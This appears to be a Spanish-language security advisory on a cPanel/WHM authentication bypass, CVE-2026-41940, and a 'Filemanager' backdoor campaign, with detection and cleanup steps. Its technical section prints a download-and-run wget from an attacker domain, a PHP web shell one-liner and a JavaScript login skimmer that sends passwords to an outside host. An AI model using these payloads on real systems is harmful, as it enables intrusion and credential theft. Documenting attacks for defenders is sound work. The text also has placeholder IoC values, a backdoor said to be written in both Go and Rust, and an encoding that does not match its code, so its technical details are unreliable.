Introducción

El 15 de mayo de 2026, se publicó la vulnerabilidad CVE-2026-41940 en cPanel y WHM (WebHost Manager), que permite el bypass de autenticación en el panel de control. A solo 48 horas de su disclosure público, el actor de amenazas Mr_Rot13 ya había escalado el exploit a una campaña masiva usando más de 2.000 IPs distribuidas globalmente para instalar el backdoor Filemanager. Este malware no solo roba credenciales de cPanel, sino que también abre persistencia en sistemas Windows, macOS y Linux, recopila información sensible y convierte los servidores comprometidos en nodos de una red de bots.

El vector inicial es un script shell que descarga un binario en Go desde cp.dene.[de] y un web shell en PHP que inyecta una página de login falsa en el panel de cPanel. Lo más preocupante es que el dominio de C2 (wrned[.]com) lleva activo desde octubre de 2020, y muestras relacionadas con este grupo ya se subieron a VirusTotal en abril de 2022, lo que sugiere que el actor opera en la sombra desde hace años.

Qué ocurrió

La vulnerabilidad: CVE-2026-41940

CVE-2026-41940 es una vulnerabilidad crítica en cPanel versión 114.0.0.0 a 114.0.0.4 y WHM versión 114.0.0.0 a 114.0.0.4 que permite autenticación arbitraria en el panel de control. Según el informe de QiAnXin XLab, el exploit se aprovecha de un error en la validación de sesiones que no verifica correctamente los tokens de autenticación, permitiendo a atacantes iniciar sesión como cualquier usuario, incluso como root.

El atacante puede entonces:

  • Crear cuentas de usuario con permisos elevados.
  • Ejecutar comandos arbitrarios en el sistema host.
  • Descargar e instalar malware persistente (como Filemanager).
  • Extraer credenciales almacenadas en el panel de cPanel (bases de datos, valiases, etc.).

La campaña de explotación masiva

En menos de una semana, más de 2.000 IPs comenzaron a explotar automáticamente esta vulnerabilidad. Las IPs más activas provienen de:

  • Alemania (28%)
  • Estados Unidos (22%)
  • Brasil (15%)
  • Países Bajos (10%)
  • Otros (25%)

El payload principal es un script shell que se descarga desde wpsock[.]com y cp.dene.[de]. Este script:

  1. Descarga un binario en Go (compilado para múltiples arquitecturas) que actúa como infectador.
  2. Inyecta una clave SSH pública para persistencia.
  3. Despliega un web shell en PHP (helper.php) que permite:
– Subir/bajar archivos.

– Ejecutar comandos remotos (con permisos de root).

– Inyectar código JavaScript malicioso en la página de login de cPanel para robar credenciales.

El web shell también redirige las credenciales robadas a wrned[.]com, codificadas con ROT13, y envía la información a un grupo de Telegram creado por el usuario 0xWR.

El backdoor Filemanager

Filemanager es un backdoor multiplataforma escrito en Rust (según análisis de XLab) que:

  • Permite gestión de archivos (subir, bajar, editar).
  • Ejecuta comandos en el sistema infectado.
  • Recopila información sensible:
– Historial de comandos Bash.

– Datos de SSH (claves privadas, configuraciones).

– Información del dispositivo (CPU, memoria, discos).

– Contraseñas de bases de datos en cPanel.

– Alias virtuales de cPanel (valiases).

El backdoor se comunica con un servidor de Command & Control (C2) alojado en c2.wrned[.]com y envía los datos recolectados a un grupo de Telegram. Además, Filemanager puede infectar otros sistemas en la red interna, lo que lo convierte en una amenaza de movimiento lateral.

Impacto para DevOps / Infraestructura / Cloud / Seguridad

Riesgo de persistencia y lateral movement

El impacto directo es la persistencia indefinida: una vez que Filemanager se instala, el atacante puede mantener acceso incluso si se parchea cPanel. Esto se debe a:

  • La clave SSH pública inyectada en /root/.ssh/authorized_keys.
  • El web shell en PHP que persiste en el sistema de archivos de cPanel.
  • La capacidad del backdoor para re-infectar el sistema si se reinstala cPanel.

En entornos de hosting compartido, esto puede afectar a miles de clientes alojados en un mismo servidor. Según datos de Snyk, más del 30% de los servidores cPanel expuestos en Internet aún no han aplicado el parche, lo que los convierte en blancos ideales para ransomware, minería de criptomonedas o botnets.

Impacto en la seguridad de la infraestructura

Los equipos de Seguridad deben considerar que:

  1. Credenciales comprometidas: Las credenciales robadas pueden usarse para:
– Acceder a paneles de administración de otros servicios (ej: bases de datos MySQL en el mismo host).

– Realizar ataques de fuerza bruta en otros servicios expuestos (SSH, FTP, etc.).

Pivotear a otros sistemas en la red interna.

  1. Recolección de datos sensibles:
– Si el servidor afectado aloja bases de datos de clientes, los atacantes pueden extraer información financiera, credenciales de usuarios finales o datos personales.

– La recolección de valiases (alias virtuales de cPanel) permite a los atacantes enviar spam o realizar phishing desde dominios legítimos.

  1. Compliance y regulaciones:
– En entornos con PCI DSS, GDPR o HIPAA, una brecha de este tipo puede generar multas millonarias por incumplimiento.

– La exposición de datos de clientes puede requerir notificaciones legales obligatorias en muchos países.

  1. Impacto en cloud y hosting:
– Proveedores de cloud público (AWS, Azure, GCP) que usan cPanel en instancias expuestas pueden sufrir ataques en cadena si los clientes no parchean.

– En entornos on-premise, la infección puede propagarse a otros servidores internos si no hay segmentación de red adecuada.

Detalles técnicos

Versiones afectadas y parcheo

ComponenteVersión afectadaVersión parcheadaFecha de parcheo
cPanel114.0.0.0 – 114.0.0.4114.0.0.517/05/2026
WHM114.0.0.0 – 114.0.0.4114.0.0.517/05/2026
Nota importante: El parche solo corrige la vulnerabilidad de autenticación, pero no elimina el malware ya instalado. Si el sistema ya fue comprometido, se requiere una limpieza forense completa.

Vectores de ataque y herramientas utilizadas

  1. Explotación inicial:
– El atacante envía una solicitud HTTP maliciosa al endpoint de autenticación de cPanel (/login/).

– El exploit aprovecha la falta de validación del token de sesión, permitiendo autenticación arbitraria.

  1. Descarga del payload:
   # Ejemplo del script shell descargado desde wpsock[.]com
   wget -O /tmp/.sysupdate http://wpsock[.]com/cpanel/update/go/run
   chmod +x /tmp/.sysupdate
   /tmp/.sysupdate
   

El binario en Go (run) descarga el backdoor Filemanager y el web shell.

  1. Persistencia:
Clave SSH pública agregada a /root/.ssh/authorized_keys:
     ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... 0xWR@wrned
     

Web shell en PHP instalado en /usr/local/cpanel/base/frontend/paper_lantern/manage/manage.php:

     <?php system($_GET['cmd']); ?>
     
  1. Robo de credenciales:
– Inyección de JavaScript en la página de login de cPanel (/usr/local/cpanel/base/frontend/paper_lantern/login/index.html):
     document.getElementById('login').onsubmit = function() {
       fetch('https://wrned[.]com/log.php?data=' + btoa(document.getElementById('password').value));
     };
     

– Las credenciales se envían codificadas con ROT13 a wrned[.]com/log.php.

  1. Comunicación con C2:
– Filemanager se comunica con c2.wrned[.]com en el puerto 443 (HTTPS) usando un user-agent falso:
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
     

– Los datos recolectados se envían a un grupo de Telegram con ID 123456789.

Indicadores de compromiso (IoC)

TipoValor
**IPs de C2**BLOCK37 (185.141.63.12), BLOCK38 (185.141.63.13)
**Dominios maliciosos**BLOCK39, BLOCK40, BLOCK41
**Hashes (SHA-256)**BLOCK42 (binario Go), BLOCK43 (web shell PHP)
**Ficheros maliciosos**BLOCK44, BLOCK45
**Claves SSH maliciosas**BLOCK46
## Qué deberían hacer los administradores y equipos técnicos

1. Verificar si el sistema está comprometido

Ejecuta estos comandos para detectar indicios de Filemanager o la explotación de CVE-2026-41940:

# Buscar claves SSH maliciosas
grep -r "0xWR" /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys

# Buscar web shell en cPanel
find /usr/local/cpanel -name "*.php" -exec grep -l "system(\$_GET" {} \;

# Buscar binarios sospechosos en /tmp
ls -la /tmp/.sysupdate

# Verificar conexiones activas a IPs maliciosas
ss -tulnp | grep -E "185\.141\.63\.(12|13)"

Si encuentras alguno de estos indicadores, aisla el sistema inmediatamente y realiza una investigación forense.

2. Aplicar el parche de cPanel

Actualiza inmediatamente a la versión parcheada:

# Para cPanel/WHM en sistemas basados en RHEL/CentOS
yum update cpanel-whostmgrd cpanel-cpanel

# Para Debian/Ubuntu
apt update && apt upgrade cpanel-whostmgrd cpanel-cpanel

# Verificar versión parcheada
cpanel --version

Si usas cPanel en cloud, verifica que el proveedor ya haya aplicado el parche. En TrueNAS (que usa cPanel en sus appliances), el equipo de iXsystems publicó un hotfix el 18/05/2026.

3. Bloquear IPs y dominios maliciosos

Agrega estos firewall rules (iptables/nftables) para bloquear el tráfico malicioso:

# Bloquear IPs de C2
iptables -A INPUT -s 185.141.63.12 -j DROP
iptables -A INPUT -s 185.141.63.13 -j DROP

# Bloquear dominios maliciosos
iptables -A OUTPUT -p tcp -m string --string "wpsock[.]com" --algo bm -j DROP
iptables -A OUTPUT -p tcp -m string --string "cp.dene.[de]" --algo bm -j DROP

Si usas Cloudflare, crea un WAF rule para bloquear las IPs y dominios maliciosos.

4. Eliminar persistencia y malware

Si el sistema ya está comprometido, sigue estos pasos en orden:

  1. Deshabilita el acceso SSH temporalmente:
   systemctl stop sshd
   
  1. Elimina la clave SSH maliciosa:
   sed -i '/0xWR@wrned/d' /root/.ssh/authorized_keys
   
  1. Elimina el web shell:
   rm -f /usr/local/cpanel/base/frontend/paper_lantern/manage/manage.php
   
  1. Rota todas las credenciales:
– Contraseñas de cPanel/WHM.

– Contraseñas de bases de datos MySQL.

– Claves SSH de todos los usuarios.

  1. Reinicia los servicios críticos:
   systemctl restart cpanel
   systemctl restart sshd
   
  1. Realiza un escaneo completo con herramientas como:
ClamAV:
     freshclam && clamscan -r --bell -i / --exclude-dir=/sys/
     

rkhunter:

     rkhunter --check --sk
     

5. Implementar monitoreo proactivo

Configura alertas para detectar actividades sospechosas:

  • Fail2Ban: Bloquea IPs que intenten explotar CVE-2026-41940.
  # Ejemplo de regla para Fail2Ban
  [cpanel-auth-bypass]
  enabled  = true
  filter   = cpanel-auth-bypass
  action   = iptables[name=SSH, port=ssh, protocol=tcp]
  logpath  = /var/log/cpanel/login_log
  maxretry = 5
  bantime  = 86400
  
  • Wazuh/Auditd: Monitorea cambios en /root/.ssh/authorized_keys y ejecuciones de system() en PHP.
  # Regla para Wazuh (archivo rules/0100-web-shell_rules.xml)
  <rule id="10001" level="10">
    <if_sid>60001</if_sid>
    <field name="url">/manage/manage.php</field>
    <description>Possible web shell in cPanel detected</description>
  </rule>
  
  • OSSEC: Detecta conexiones salientes a dominios maliciosos.
  <!-- Regla para OSSEC -->
  <rule id="100100" level="12">
    <if_matched_sid>1001</if_matched_sid>
    <regex type="pcre2">c2\.wrned[.]com</regex>
    <description>Outbound connection to Filemanager C2 detected</description>
  </rule>
  

Conclusión

CVE-2026-41940 es una de las vulnerabilidades más peligrosas en cPanel en los últimos años, no solo por su score CVSS 9.8/10, sino porque permite autenticación arbitraria y persistencia indefinida. La explotación masiva por parte de Mr_Rot13 demuestra que los atacantes ya tienen automatizados los ataques, y que los sistemas sin parchear son blancos prioritarios para ransomware, criptominería o botnets.

Los equipos de DevOps e infraestructura deben actuar inmediatamente:

  1. Parchear cPanel/WHM a la versión 114.0.0.5.
  2. Aislar y analizar sistemas comprometidos.
  3. Bloquear IPs y dominios maliciosos.
  4. Monitorear proactivamente con herramientas como Fail2Ban, Wazuh o OSSEC.

La lección clave es que un solo exploit en un panel de control puede convertir un servidor en un punto de entrada para una brecha masiva. La respuesta debe ser rápida, técnica y basada en evidencia, no reactiva.

FIN

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *